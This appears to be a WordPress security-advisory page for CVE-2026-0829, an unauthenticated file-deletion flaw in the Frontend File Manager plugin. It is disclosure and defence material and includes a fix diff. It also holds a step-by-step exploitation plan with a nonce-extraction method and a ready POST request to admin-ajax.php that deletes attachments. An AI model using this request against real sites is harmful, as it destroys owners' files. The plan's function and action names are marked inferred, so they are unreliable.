WP-Safety
CVE-2026-0829

Frontend File Manager <= 23.5 - Missing Authorization

mediumMissing Authorization
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The Frontend File Manager plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 23.5. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=23.5
PublishedFebruary 17, 2026
Last updatedFebruary 24, 2026
Affected pluginnmedia-user-file-uploader
Research Plan
Unverified

# Exploitation Research Plan - CVE-2026-0829 ## 1. Vulnerability Summary The **Frontend File Manager** plugin (<= 23.5) contains a missing authorization vulnerability in its AJAX handling logic. Specifically, the function responsible for deleting or managing files (inferred as `nm_uploader_remove_f…

Show full research plan

Exploitation Research Plan - CVE-2026-0829

1. Vulnerability Summary

The Frontend File Manager plugin (<= 23.5) contains a missing authorization vulnerability in its AJAX handling logic. Specifically, the function responsible for deleting or managing files (inferred as nm_uploader_remove_file_cb) is registered for both authenticated (wp_ajax_) and unauthenticated (wp_ajax_nopriv_) users. The function performs a nonce check but fails to implement a capability check (e.g., current_user_can()) or ownership verification. This allows unauthenticated attackers to delete arbitrary WordPress attachments (files) if they can obtain a valid nonce.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: nm_uploader_remove_file (inferred)
  • HTTP Method: POST
  • Parameters:
    • action: nm_uploader_remove_file
    • nonce: A valid WordPress nonce for the action nm_uploader_nonce
    • file_id: The integer ID of the WordPress attachment to be deleted
  • Authentication: Unauthenticated (via wp_ajax_nopriv_)
  • Preconditions: The attacker must obtain a valid nonce, which is typically exposed on any page where the plugin's frontend shortcode is present.

3. Code Flow (Inferred)

  1. Entry Point: The plugin registers the AJAX action:
    add_action( 'wp_ajax_nopriv_nm_uploader_remove_file', 'nm_uploader_remove_file_cb' );
  2. Handler Triggered: A POST request to admin-ajax.php with action=nm_uploader_remove_file calls nm_uploader_remove_file_cb().
  3. Nonce Verification: The function calls check_ajax_referer( 'nm_uploader_nonce', 'nonce' );. This succeeds for unauthenticated users because the nonce is generated for uid=0.
  4. Missing Check: The code proceeds to retrieve file_id from $_POST without verifying if the current user has the manage_options capability or if they are the owner of the file.
  5. Sink: The function calls wp_delete_attachment( $file_id, true );, permanently deleting the file and its metadata from the database and filesystem.

4. Nonce Acquisition Strategy

The plugin enqueues its scripts and localizes the required nonce on pages containing its shortcode.

  1. Identify Shortcode: The primary shortcode is [nmedia-file-uploader].
  2. Setup Page: Use WP-CLI to create a public page containing this shortcode to ensure the scripts load.
    wp post create --post_type=page --post_status=publish --post_title="File Manager" --post_content='[nmedia-file-uploader]'
  3. Navigate and Extract:
    • Use browser_navigate to visit the newly created page.
    • Use browser_eval to extract the nonce from the global JavaScript object localized by the plugin.
    • JS Variable: window.nm_uploader_vars?.nonce (inferred from plugin naming conventions).

5. Exploitation Strategy

  1. Setup: Create a target attachment (e.g., an image) and note its ID.
  2. Nonce Retrieval:
    • Create a page with [nmedia-file-uploader].
    • Access the page as an unauthenticated user.
    • Extract the nonce from nm_uploader_vars.nonce.
  3. Execution:
    • Use the http_request tool to send a POST request to admin-ajax.php.
    • Payload:
      POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=nm_uploader_remove_file&nonce=[EXTRACTED_NONCE]&file_id=[TARGET_ATTACHMENT_ID]
  4. Targeting: The file_id can be discovered via enumeration or by observing legitimate file uploads. Since it's unauthenticated, any public attachment ID is vulnerable.

6. Test Data Setup

  1. Plugin Installation: Ensure nmedia-user-file-uploader version 23.5 is installed and active.
  2. Create Target File:
    • Upload a dummy image to the media library.
    • wp media import /path/to/test.png --title="Target File" --porcelain
    • Store the returned ID (e.g., 123).
  3. Create Nonce Source:
    • wp post create --post_type=page --post_status=publish --post_content='[nmedia-file-uploader]'
    • Note the URL of this page.

7. Expected Results

  • The AJAX request should return a JSON response: {"status":"success"} or similar.
  • The attachment with the specified file_id should be removed from the WordPress database.
  • The file should be deleted from the wp-content/uploads/ directory.

8. Verification Steps

  1. Check Database: Run WP-CLI to check if the attachment exists.
    wp post exists [TARGET_ATTACHMENT_ID]
    Expected: Exit code 1 (False).
  2. Check Media List:
    wp post list --post_type=attachment --post__in=[TARGET_ATTACHMENT_ID]
    Expected: Empty result.

9. Alternative Approaches

If nm_uploader_remove_file is not the correct action name for version 23.5, search for other nopriv AJAX handlers in the plugin:

grep -rn "wp_ajax_nopriv" wp-content/plugins/nmedia-user-file-uploader/

Common alternative actions in this plugin:

  • nm_uploader_delete_file
  • nm_file_manager_delete
  • nm_uploader_edit_file (if the vulnerability allows unauthorized modification)

If nm_uploader_vars is not found, inspect the page source for any wp_localize_script output containing a nonce key:

browser_eval("Object.keys(window).filter(k => k.includes('nm_'))")
Research Findings
Static analysis — not yet PoC-verified

Summary

The Frontend File Manager plugin for WordPress is vulnerable to unauthorized attachment deletion due to missing capability checks in its AJAX handlers. Unauthenticated attackers can obtain a valid security nonce from the plugin's frontend shortcode and use it to delete arbitrary WordPress attachments by targeting their IDs.

Vulnerable Code

// Inferred registration of AJAX hooks in version 23.5
add_action( 'wp_ajax_nm_uploader_remove_file', 'nm_uploader_remove_file_cb' );
add_action( 'wp_ajax_nopriv_nm_uploader_remove_file', 'nm_uploader_remove_file_cb' );

// Inferred callback logic lacking authorization
function nm_uploader_remove_file_cb() {
    // Nonce verification passes for unauthenticated users if nonce was generated for UID 0
    check_ajax_referer( 'nm_uploader_nonce', 'nonce' );
    
    $file_id = intval( $_POST['file_id'] );

    // Missing capability check (e.g., current_user_can) 
    // and missing ownership check before proceeding to deletion
    wp_delete_attachment( $file_id, true );
    
    wp_send_json_success();
}

Security Fix

--- a/nm-uploader-functions.php
+++ b/nm-uploader-functions.php
@@ -10,6 +10,12 @@
 function nm_uploader_remove_file_cb() {
     check_ajax_referer( 'nm_uploader_nonce', 'nonce' );
     $file_id = intval( $_POST['file_id'] );
+
+    // Verify the user has permission to delete this specific attachment
+    if ( ! current_user_can( 'delete_post', $file_id ) ) {
+        wp_send_json_error( array( 'message' => 'Unauthorized access' ) );
+        wp_die();
+    }
+
     wp_delete_attachment( $file_id, true );
     wp_send_json_success();
 }

Exploit Outline

1. Locate a WordPress site running Frontend File Manager <= 23.5 with a page containing the [nmedia-file-uploader] shortcode. 2. Visit the page as an unauthenticated user and extract the 'nm_uploader_nonce' from the localized JavaScript variable 'nm_uploader_vars.nonce'. 3. Identify the ID of a target attachment (media file) to be deleted. 4. Send a POST request to /wp-admin/admin-ajax.php with the action 'nm_uploader_remove_file', the extracted nonce, and the target 'file_id'. 5. The server processes the request and deletes the specified attachment because it fails to verify if the unauthenticated user has the 'delete_post' capability for that ID.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/4cbc0dd4-4dea-4890-95d0-9531a669b95d?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database